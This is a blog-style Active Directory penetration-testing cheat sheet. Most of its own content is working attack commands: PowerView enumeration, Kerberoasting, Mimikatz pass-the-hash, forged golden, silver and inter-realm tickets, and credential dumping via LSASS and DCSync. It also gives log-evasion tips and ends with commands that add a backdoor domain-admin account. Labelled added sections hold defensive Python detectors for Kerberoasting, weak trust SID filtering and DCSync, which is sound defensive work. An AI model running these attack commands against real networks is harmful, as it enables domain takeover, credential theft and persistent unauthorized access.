Cheat Sheet

Enumeration

AD Enumeration With PowerView

Though the list below gives a good representation of the commands I find most useful, it only scratches the surface of what PowerView can do. PowerView is available here.

```powershell
# Get all users in the current domain
Get-DomainUser | select -ExpandProperty cn

# Get all computers in the current domain
Get-DomainComputer

# Get all domains in current forest
Get-ForestDomain

# Get domain/forest trusts
Get-DomainTrust
Get-ForestTrust

# Get information for the DA group
Get-DomainGroup "Domain Admins"

# Find members of the DA group
Get-DomainGroupMember "Domain Admins" | select -ExpandProperty membername

# Find interesting shares in the domain, ignore default shares, and check access
Find-DomainShare -ExcludeStandard -ExcludePrint -ExcludeIPC -CheckShareAccess

# Get OUs for current domain
Get-DomainOU -FullData

# Get computers in an OU
# %{} is a looping statement
Get-DomainOU -name Servers | %{ Get-DomainComputer -SearchBase $_.distinguishedname } | select dnshostname

# Get GPOs applied to a specific OU
Get-DomainOU *WS* | select gplink
Get-DomainGPO -Name "{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}"

# Get Restricted Groups set via GPOs, look for interesting group memberships forced via domain
Get-DomainGPOLocalGroup -ResolveMembersToSIDs | select GPODisplayName, GroupName, GroupMemberOf, GroupMembers

# Get the computers where users are part of a local group through a GPO restricted group
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName

# Find principals that can create new GPOs in the domain
Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=targetdomain,DC=com" -ResolveGUIDs | ?{ $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier

# Find principals that can link GPOs to OUs
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier

# Get incoming ACL for a specific object
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | Select IdentityReference,ActiveDirectoryRights

# Find interesting ACLs for the entire domain, show in a readable (left-to-right) format
Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

# Get interesting outgoing ACLs for a specific user or group
# ?{} is a filter statement
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "Domain Admins"} | select ObjectDN,ActiveDirectoryRights
```

Lateral Movement

Lateral Movement Enumeration With PowerView

```powershell
# Look for kerberoastable users
Get-DomainUser -SPN | select name,serviceprincipalname
```

BloodHound

Use Invoke-BloodHound from SharpHound.ps1, or use SharpHound.exe.
Both can be run reflectively, get them here. Examples below use the PowerShell variant but arguments are identical.

```powershell
# Run all checks, including restricted groups enforced through the domain
Invoke-BloodHound -CollectionMethod All,GPOLocalGroup

# Running LoggedOn separately sometimes gives you more sessions, but enumerates by looping through hosts so is VERY noisy
Invoke-BloodHound -CollectionMethod LoggedOn
```

Kerberoasting

Automatic

With PowerView:

```powershell
Get-DomainSPNTicket -SPN "MSSQLSvc/sqlserver.targetdomain.com"
```
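From the blue-team side, the `Get-DomainUser -SPN | Get-DomainSPNTicket` pattern above leaves a characteristic trace: one account requesting RC4-encrypted service tickets (4769, TicketEncryptionType 0x17) for many different service accounts in a short window. The following detector is an added example, not part of the original cheat sheet or of PowerView; it assumes the 4769 fields have already been extracted into one dict per event (as a SIEM would do), and the events it runs on are constructed samples.

```python
"""Flag likely Kerberoasting from Windows Security event 4769 records.

Added example (not from the cheat sheet). Each event is assumed to be a dict
with the 4769 fields already parsed out of the event XML; SAMPLE_EVENTS below
are constructed, not real log data.
"""
from collections import defaultdict

RC4_HMAC = 0x17   # TicketEncryptionType value for RC4-HMAC (default for roasting tools)
SUCCESS = 0x0     # 4769 Status: a ticket was actually issued


def is_kerberoast_candidate(ev):
    """True for a successful RC4 service-ticket request to a non-machine,
    non-krbtgt service account, i.e. a ticket someone could crack offline."""
    if ev.get("EventID") != 4769 or ev.get("Status") != SUCCESS:
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        # Machine accounts have random passwords; krbtgt entries are TGT
        # renewals/referrals. Neither is a roasting target.
        return False
    return ev.get("TicketEncryptionType") == RC4_HMAC


def find_kerberoasters(events, min_services=3):
    """Group candidate requests by requesting account and return
    {account: sorted service accounts} for accounts that hit at least
    min_services distinct SPN-bearing accounts. The threshold keeps a single
    legacy RC4 ticket from alerting in domains that still allow RC4."""
    by_user = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in by_user.items()
            if len(svcs) >= min_services}


def _ev(user, service, etype, status=SUCCESS):
    """Build a constructed 4769 record (helper for the sample data only)."""
    return {"EventID": 4769, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}


# Constructed sample: jdoe requests RC4 tickets for three service accounts,
# plus noise that the detector must ignore.
SAMPLE_EVENTS = [
    _ev("jdoe@TARGETDOMAIN.COM", "sqlsvc", 0x17),
    _ev("jdoe@TARGETDOMAIN.COM", "websvc", 0x17),
    _ev("jdoe@TARGETDOMAIN.COM", "backupsvc", 0x17),
    _ev("jdoe@TARGETDOMAIN.COM", "WS01$", 0x17),            # machine account: ignored
    _ev("jdoe@TARGETDOMAIN.COM", "krbtgt", 0x17),           # TGT referral: ignored
    _ev("asmith@TARGETDOMAIN.COM", "sqlsvc", 0x12),         # AES256-CTS: normal ticket
    _ev("asmith@TARGETDOMAIN.COM", "websvc", 0x17, status=0x7),  # KDC_ERR_S_PRINCIPAL_UNKNOWN
]

if __name__ == "__main__":
    for user, services in find_kerberoasters(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

The cheapest mitigation this check points at is removing the RC4 signal altogether: give service accounts long random passwords (or use gMSAs) and set `msDS-SupportedEncryptionTypes` on them to AES only, so a 0x17 ticket for such an account becomes a hard indicator rather than a threshold-tuned one.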

Lateral Movement with Mimikatz

Note that Mimikatz is incredibly versatile and is discussed in multiple sections throughout this blog. Because of this, however, the binary is also very well-detected. If you need to run Mimikatz on your target (not recommended), executing a custom version reflectively is your best bet.

```
# Overpass-the-hash (more risky than Rubeus, writes to LSASS memory)
sekurlsa::pth /user:Administrator /domain:targetdomain.com /ntlm:[NTLMHASH] /run:powershell.exe

# Or, a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands
sekurlsa::pth /user:Administrator /domain:targetdomain.com /aes256:[AES256KEY] /run:powershell.exe

# Golden ticket (domain admin, w/ some ticket properties to avoid detection)
kerberos::golden /user:Administrator /domain:targetdomain.com /sid:S-1-5-21-[DOMAINSID] /krbtgt:[KRBTGTHASH] /id:500 /groups:513,512,520,518,519 /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Silver ticket for a specific SPN with a compromised service / machine account
kerberos::golden /user:Administrator /domain:targetdomain.com /sid:S-1-5-21-[DOMAINSID] /rc4:[MACHINEACCOUNTHASH] /target:dc.targetdomain.com /service:HOST /id:500 /groups:513,512,520,518,519 /startoffset:0 /endin:600 /renewmax:10080 /ptt
```

Abusing domain trust

All commands must be run with DA privileges in the current domain.

Note that if you completely compromise a child domain (currentdomain.targetdomain.com), you can by definition also compromise the parent domain (targetdomain.com) due to the implicit trust relationship. The same applies to any trust relationship where SID filtering is disabled (see ‘Abusing inter-forest trust’ below).

Using domain trust key

From the DC, dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using Mimikatz, adding the SID for the target domain’s enterprise admins group to our ‘SID history’.

```
kerberos::golden /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:targetdomain.com /ticket:c:\users\public\ticket.kirbi
```

We can now DCSync the target domain (see below).

Using krbtgt hash

From the DC, dump the krbtgt hash using e.g. DCSync or LSADump. Then, using this hash, forge an inter-realm TGT using Mimikatz, as with the previous method.

Doing this requires the SID of the current domain as the /sid parameter, and the SID of the target domain as part of the /sids parameter. You can grab these using PowerView’s Get-DomainSID. Use a SID History (/sids) of *-516 and S-1-5-9 to disguise as the Domain Controllers group and Enterprise Domain Controllers respectively, to be less noisy in the logs.

```
kerberos::golden /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /user:DC$ /groups:516 /ptt
```

If you are having issues creating this ticket, try adding the ‘target’ flag, e.g. /target:targetdomain.com.

Alternatively, generate a domain admin ticket with SID history of enterprise administrators group in the target domain.

```
kerberos::golden /user:Administrator /domain:currentdomain.targetdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /sids:S-1-5-21-280534878-1496970234-700767426-519 /ptt
```

We can now immediately DCSync the target domain, or get a reverse shell using e.g. scheduled tasks.

Abusing inter-forest trust

Since a forest is a security boundary, we can only access domain services that have been shared with the domain we have compromised (our source domain). Use e.g. BloodHound to look for users that have an account (with the same username) in both forests and try password re-use. Additionally, we can use BloodHound or PowerView to hunt for foreign group memberships between forests. The PowerView command:

```powershell
Get-DomainForeignGroupMember -domain targetdomain.com
```

In some cases, SID filtering (the protection that causes the limitation above) is disabled between forests. If you run Get-DomainTrust and you see the TREAT_AS_EXTERNAL property, this is the case! You can then abuse the forest trust like a domain trust, as described above. Note that you still can NOT forge a ticket for any SID between 500 and 1000, so you can’t become DA (not even indirectly through group inheritance). In this case, look for groups that grant e.g. local admin on the domain controller or similar non-domain privileges. For more information, refer to this blog post.
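The TREAT_AS_EXTERNAL property mentioned above is one bit of the LDAP `trustAttributes` bitmask on each `trustedDomain` object, and the same bitmask tells you whether an external trust has SID filtering (quarantine) switched off. The audit below is an added example, not from the cheat sheet or from PowerView: it decodes the bitmask using the TRUST_ATTRIBUTE_* flag values from MS-ADTS and flags trusts whose SID filtering is relaxed or absent. The trust records it runs on are constructed samples shaped like the output of an LDAP query for `(objectClass=trustedDomain)`.

```python
"""Decode trustAttributes and flag trusts with weak or no SID filtering.

Added example (not from the cheat sheet). Flag values are the
TRUST_ATTRIBUTE_* constants from MS-ADTS 6.1.6.7.9; SAMPLE_TRUSTS are
constructed records, not output from a real domain.
"""

TRUST_ATTRIBUTE = {
    0x00000001: "NON_TRANSITIVE",
    0x00000002: "UPLEVEL_ONLY",
    0x00000004: "QUARANTINED_DOMAIN",     # SID filtering quarantine is ON
    0x00000008: "FOREST_TRANSITIVE",
    0x00000010: "CROSS_ORGANIZATION",
    0x00000020: "WITHIN_FOREST",          # parent/child or tree-root trust
    0x00000040: "TREAT_AS_EXTERNAL",      # forest trust with SID history enabled
    0x00000080: "USES_RC4_ENCRYPTION",
    0x00000200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x00000800: "PIM_TRUST",
}

# Finding tags returned by assess_trust()
INTRA_FOREST = "INTRA_FOREST_NO_SID_FILTERING"
RELAXED = "SID_FILTERING_RELAXED"        # TREAT_AS_EXTERNAL on a forest trust
DISABLED = "SID_FILTERING_DISABLED"      # external trust without quarantine


def decode_trust_attributes(value):
    """Return the flag names set in a trustAttributes integer, low bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTE.items()) if value & bit]


def assess_trust(trust):
    """Return a list of finding tags for one trustedDomain record."""
    flags = set(decode_trust_attributes(trust["trustAttributes"]))
    findings = []
    if "WITHIN_FOREST" in flags:
        # A forest is the security boundary: intra-forest trusts never filter
        # SIDs, so compromise of one domain means compromise of the forest.
        findings.append(INTRA_FOREST)
    elif "FOREST_TRANSITIVE" in flags:
        # Forest trusts filter SIDs by default; TREAT_AS_EXTERNAL lets SIDs
        # with RID >= 1000 from the other forest through in SID history.
        if "TREAT_AS_EXTERNAL" in flags:
            findings.append(RELAXED)
    elif "QUARANTINED_DOMAIN" not in flags:
        # External (non-forest) trust: quarantine is what enforces filtering.
        findings.append(DISABLED)
    return findings


def audit_trusts(trusts):
    """Map trust name -> findings, only for trusts that have any."""
    report = {}
    for trust in trusts:
        findings = assess_trust(trust)
        if findings:
            report[trust["name"]] = findings
    return report


# Constructed sample trusts as seen from the compromised domain.
SAMPLE_TRUSTS = [
    {"name": "targetdomain.com", "trustAttributes": 0x20},       # parent domain, same forest
    {"name": "partner.example", "trustAttributes": 0x08},        # forest trust, default filtering
    {"name": "legacy.example", "trustAttributes": 0x48},         # forest trust + TREAT_AS_EXTERNAL
    {"name": "old-external.example", "trustAttributes": 0x00},   # external trust, no quarantine
    {"name": "vendor.example", "trustAttributes": 0x05},         # external, non-transitive, quarantined
]

if __name__ == "__main__":
    for name, findings in audit_trusts(SAMPLE_TRUSTS).items():
        print(f"{name}: {', '.join(findings)}")
```

On a live domain the same dicts come from `Get-ADTrust -Filter * | Select Name, TrustAttributes` or a raw LDAP search; the remediation for a RELAXED or DISABLED finding is `netdom trust <trusting> /domain:<trusted> /EnableSIDHistory:no` for forest trusts and `/Quarantine:yes` for external trusts, after checking that nothing legitimately depends on migrated SID history across that trust.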

To impersonate a user from our source domain to access services in a foreign domain, we can do the following. First, extract the inter-forest trust key as in ‘Using domain trust key’ above.

Use Mimikatz to generate a TGT for the target domain using the trust key:

```
Kerberos::golden /user:Administrator /service:krbtgt /domain:currentdomain.com /sid:S-1-5-21-1874506631-3219952063-538504511 /target:targetdomain.com /rc4:fe8884bf222153ca57468996c9b348e9 /ticket:ticket.kirbi
```

Post exploitation

Dumping OS credentials with Mimikatz

```
# Dump logon passwords
sekurlsa::logonpasswords

# Dump all domain hashes from a DC
## Note: Everything with /patch is noisy as heck since it writes to LSASS 🚩
lsadump::lsa /patch

# Dump only local users
lsadump::sam

# DCSync (requires 'ldap' SPN)
lsadump::dcsync /user:DOMAIN\krbtgt /domain:targetdomain.com

# Dump Windows secrets, such as stored creds for scheduled tasks (elevate first) 🚩
vault::list
vault::cred /patch

# Dump Kerberos encryption keys, including the AES256 key for better opsec (see 'Lateral Movement with Rubeus' section)
sekurlsa::ekeys
```
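Unlike the `/patch` commands above, `lsadump::dcsync` never touches LSASS on the DC; it simply asks the DC to replicate, so the place it shows up is the DC's own audit log. With "Audit Directory Service Access" enabled, each replication request produces a 4662 with AccessMask 0x100 (Control Access) whose Properties list the replication extended rights, and the only subjects that should ever appear there are domain controllers and known sync accounts. The detector below is an added example, not from the cheat sheet or from Mimikatz; the rightsGuid values are the documented GUIDs of the three replication control-access rights, the 4662 fields are assumed to be pre-parsed into dicts, and the events, the DC names and the `MSOL_12345` sync account are constructed.

```python
"""Flag DCSync-style replication requests from Windows Security event 4662.

Added example (not from the cheat sheet). Events are assumed to be dicts
with the 4662 fields already extracted; SAMPLE_EVENTS and the account names
in TRUSTED_REPLICATORS are constructed, not taken from a real domain.
"""

# rightsGuid of the replication control-access rights, as written into the
# 4662 Properties field (braced, usually lower-case).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # 4662 AccessMask value for extended (control) rights


def replication_rights_used(ev):
    """Names of replication rights listed in the event's Properties field."""
    props = ev.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def is_dcsync_candidate(ev, trusted_replicators):
    """True when a 4662 exercises a replication right and the subject is not
    a domain controller or an allow-listed directory-sync account."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
        return False
    if not replication_rights_used(ev):
        return False
    return ev.get("SubjectUserName") not in trusted_replicators


def find_dcsync(events, trusted_replicators):
    """Return (subject, [rights]) for every candidate event, in log order."""
    return [(ev["SubjectUserName"], replication_rights_used(ev))
            for ev in events if is_dcsync_candidate(ev, trusted_replicators)]


GET_CHANGES = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GET_CHANGES_ALL = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
WRITE_PROPERTY = 0x20


def _ev(subject, properties, mask=CONTROL_ACCESS):
    """Build a constructed 4662 record (helper for the sample data only)."""
    return {"EventID": 4662, "SubjectUserName": subject,
            "AccessMask": mask, "Properties": properties}


# Constructed allow-list: DC machine accounts plus a hypothetical Azure AD
# Connect style sync account that legitimately replicates.
TRUSTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_12345"}

SAMPLE_EVENTS = [
    _ev("DC01$", f"%%7688\n\t{GET_CHANGES_ALL}"),                   # normal DC replication
    _ev("MSOL_12345", f"%%7688\n\t{GET_CHANGES}\n\t{GET_CHANGES_ALL}"),  # allow-listed sync account
    _ev("jdoe", f"%%7688\n\t{GET_CHANGES}\n\t{GET_CHANGES_ALL}"),   # user account replicating: DCSync
    _ev("jdoe", "%%7685\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}", WRITE_PROPERTY),  # unrelated write
]

if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS, TRUSTED_REPLICATORS):
        print(f"DCSync suspected: {subject} used {', '.join(rights)}")
```

The allow-list is the part that needs care: anything granted the replication rights on the domain head (check with `Get-DomainObjectAcl -SearchBase <domain DN> -ResolveGUIDs | ?{ $_.ObjectAceType -match "DS-Replication" }`) that is not a DC should be either documented in `TRUSTED_REPLICATORS` or have the right removed.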

Windows commands

```cmd
whoami /priv
net user user Password123! /ADD
net group "Admins du domaine" user /ADD /DOMAIN
net group "Administrateurs de l'entreprise" user /ADD /DOMAIN
```

Author

Loris

Posted on

2022-02-15

Updated on

2022-12-21
